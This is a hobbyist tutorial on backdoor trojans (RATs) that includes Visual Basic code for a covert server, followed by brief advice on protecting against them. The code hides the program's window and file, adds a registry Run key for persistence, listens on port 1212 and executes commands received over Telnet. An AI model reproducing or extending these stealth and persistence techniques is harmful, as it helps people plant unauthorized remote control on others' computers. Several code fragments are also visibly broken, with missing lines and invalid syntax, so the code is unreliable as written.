About a backdoor

This article will give you basic information about backdoor trojans
(often called RAT - Remote Administration Tool),how they work,how people make them,
what are they used for and how to protect yourself from them.
I will provide you with Visual Basic code here that will show how to code a backdoor.

1. What backdoors basically are ?

Backdoors can be stand-alone executable files but can also be parts of worms (MyDoom) or other programs.
The main purpose of a backdoor program is to provide a person remote access to the computer/network where the backdoor program is running.
Usually,backdoors run without the users consent.
Network administrators often use backdoors (usually the commercial and "legal" ones) to control their clients and supervise their actions in a business network.
In schools,backdoors are used by professors who want to prevent students from messing with school computers.

But,backdoor software is becoming more and more popular in these days among "script-kiddies" and attackers that
want to steal confidental data (credit card info,etc.) and later sell the stolen data.
"Script-kiddies" are usually young,12-13 year old children that use programs made by someone else to mess with someone's computer,just for fun.
A backdoor program can be written in a wide range of programming languages (I will show you how to write a VB one here) simply,even if the programmer who writes it isn't much experienced.
A program like this can provide almost full,or full control over the attacked machine,allowing the user to exchange files,change system settings,kill processes,open/close the CD-ROM,turn on/off monitor,run a proxy and much more you even wouldn't think about.

Sub7 was a popular backdoor-trojan written by Mobman.
It runs on Windows operating systems,and was presented on DefCon in 1999 by it's author.
Today almost every anti-virus program or firewall can pick it up,but it was used before years as a very popular remote-control program,usually by script-kiddies.
It has a way lot of functions,from playing tic-tac-toe with the attacked user,to running an FTP server on the attacked machine and allowing the hacker to exchange files with that computer.

Let-Me-Rule,or shortly just LMR is also a popular RAT,which has similar functions to Sub-7.
It's author says that the program he wrote is for network administration and not for illegal uses.
However,it was also used by many wannabe-hackers for the same purpose Sub-7 was used for.

2. How they work ?

Direct connection:
Backdoors are usually based on a client-server network communication,where the server is the attacked machine,
and the client is the attacker.It is a kind of standard.
This is called direct connection,when the client directly connects to the server.
The server application is installed on the computer you want to control and is hidden from the victim.
When the server application is runned,it will start listening for incoming connections from the client.
Attackers use the client application is different from the server,as it has a GUI (graphic user interface) that allows the attacker to connect to the server remotely,by specifying the IP address of the server computer and the port number (1-65535) on which the server application is listening.
If the connection is successfull,the client can now retreave information about the server and send commands to it.
The server recognizes the commands,and executes a part of code for each commands.
For example,when you send a command "cdopen",the server will open the CD-ROM door.
If the connection attempt failed,the server isn't running on the remote machine,or a firewall/router is blocking the access to the port used by the server.

Reverse connection:
This kind of connection between the server and the client became popular when routers became popular too.
The main advantage is that the server (or multiple servers) connect to a single client,bypassing routers.
Secondly,the client can send a single command to multiple servers that are connected (broadcasting).
Data exchange is same as in the direct communication.

3. A backdoor example in Visual Basic

If you already know some basics of the Visual Basic (VB) programming language,it will be useful now,because I'm going to show you how to write a simple backdoor,just to let you see how stuff works in real.
You will need Microsoft's Visual Studio 6 to write and compile the code.
I will show how to code a simple server application,that will listen on port 1212 for incomming connection and execute pieces of code when a commands is sent from the client.
I won't show you how to make a client application,you will need to figure that out yourself (that's a bit challenge).
However,you can control the server using the Telnet client which comes with Windows.

First open a new project (Standard EXE).Click View > Toolbox in the file menu to make the
toolbox visible if it's hidden.
Now,right-click on the toolbox on your left and select the first option,components.
A window will pop-up.In the first tab ("Components") find an option called "Microsoft Winsock Control 6.0".
Check it and click OK.
You will see an icon that is like two small monitors in your toolbox.Drag it on the form.
We've done the preparation.Now we can begin coding our small backdoor.

First lines - hiding the program and modifying registry
OK,now let's take a look on the code of the form.
Let's add some code to the Form_Load sub:

Dim Startup
If App.PrevInstance = True Then End

The first line
The second line will make the application run only once,and end if another instance of it is already running.
In the third line,the code will simply make the application window hide.That's quite simple.
If you want to make your application file hidden and marked as a system file,write a line like this:

SetAttr App.Path & "\" & App.EXEName & ".exe", vbHidden + vbSystem

To make sure the server program will run each time Windows is started,let's type:

Set Startup = CreateObject("WScript.Shell")
Startup.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\MyRAT", App.Path & "\" & App.EXEName & ".exe"

Listen for connections
The following code will make the server's winsock control listen for incomming connections:

Private Function Start()

Winsock1.LocalPort = 1212
End Function

You should put this code in a function,like shown about,so you can easily restart the listening if the connection fails or if the client disconnects.
Instead of 1212,you can type any number you want,from 1 to 65535.


Write this into the Form_Load sub,so the program will call the "Start" function you specifyied above and start listening when you run it.

Restarting the connection
If the connection brokes,make sure you can easily restart the server's listening.
Otherwise,you could connect only once per program run.
Make a timer called "tmrCheck" and set it to approximatelly 500 milliseconds.

Private Sub tmrCheck_Timer()

On Error Resume Next
If Winsock1.State = 8 Then
End If
End Sub

This timer will check every 500 milliseconds for the connection state,and if the connection is broken it will run the "Start" function again,so the server will start listening again.

Accepting connection and sending first message
When you attempt to connect to the server,it would be nice if the server would let you do that.
This code will make the server accept incomming connections and send a welcome message to the client when it is connected.

Private Sub Winsock1_ConnectionRequest(ByVal requestID As Long)

On Error Resume Next
If Winsock1.State <> sckClosed Winsock1.Close
Winsock1.Accept requestID
Winsock1.SendData "You are connected now."
End Sub

You can change the message "You are connected now." to anything you want,and you can add even more actions
to execute when someone tryies to connect to the server.

Receiving commands and executing them
I mentioned before that server programs receive commands from the client program,and that way they decide what to do for each command and which part of the code to execute.
Now I will show you how to do that.
You can add more commands and actions of course...

Private Sub Winsock1_DataArrival(ByVal bytesTotal As Long)

Dim Rcv as string
On Error Resume Next
Winsock1.GetData Rcv
Select Case Rcv

Case "notepad"
Shell "notepad"

Case "close"

Case "msg"
MsgBox "I'm in your computer!",vbCritical,"System Error"

End Select
End Sub

Put your commands in different "cases" like shown in the code above.
It will be easy for you and for everyone else to view it and edit it.
In this example,when the server receives a text command "notepad" you can send to it via Telnet,
it will launch Notepad.
When you send "close" to it,the server application will end.
And when you send "msg",a pop-up message will appear.
"Winsock1.GetData Rcv" will make sure everything that is received will be handled as a string.

All in all,this is a very simple RAT i showed you here.
You can make more winsock controls,to handle multiple connections,make a server that connects to the server without needing to use the default Telnet client for it,use better methods for hidding the server,reverse connection and an endless number of other things.

4. Protection

Now when you know how they work,it will be easier to protect yourself from backdoors.
Backdoors can penetrate your system on many ways,including e-mail,remote vulnerabilities,P2P networks or they can be dropped by another malicious program.
It's good to have in mind that no computer security is unbreakable and that everything can be disabled/bypassed.
However,you can take some steps to prevent remote attackers of accessing your data and controlling your computer.

Many people don't have firewalls installed on their computers,which isn't very suprising.
Why would they have one ? They don't know.It slows their computer down,always has anoyinng questions and takes space on the hard disk.
Firewalls are VERY important.You should know that if you're already here.
In short,firewalls control all data that is sent/received through the network you are connected to (Internet,LAN,WAN,etc.) and can easily prevent backdoor attacks.
When a backdoor server application wants to listen,the firewall will prompt you and ask you to give permission or deny.Of course,I suggest you to deny anything unless you really trust the program.
Also,a firewall will prompt you if a backdoor client is trying to remotely access your computer.
It is very useful to be informed about all data exchanged using your computer.
If you use Windows,than I suggest you to use ZoneAlarm firewall (there's a free version) or Outpost firewall.

Older backdoor programs will be catched by most anti-virus programs.
However,if you are dealing with a quite new backdoor program,unknown to anti-virus products,the possibilitty to catch it with an anti-virus program is low.
Maybe,if the anti-virus program you are using has advanced heuristic possibilities,will catch the nasty backdoor.
So anti-virus products can't really help here...

How to know ?
And if you secured yourself by methods described above,you can be still unsure about your protection.
If your network activity is high or higher than expected,but you're not doing anything on the network than a backdoor server might be exchanging data with it's server.
You can also check for open connections and ports by running "cmd" and typing "netstat -a".
This will show you a list where you can see who is connected to your computer,on which port and through which protocol.
Check your process list and startup list for strange names that are similar to the names of registered parts of the operating system.
Than,check the process names using Google and see if the process belongs to a backdoor program.
Use a port scanner to scan your own IP for open ports,so you can notice if a program opened ports without your approval.


The article reached it's end now.
I hope you enjoyed reading this article, and learnt some basics of backdoor programs and understood how they work.
I tryied to keep the article as short as possible,
just to don't keep your attention and not get off the main idea of this article.

Used sources:

Article by Feky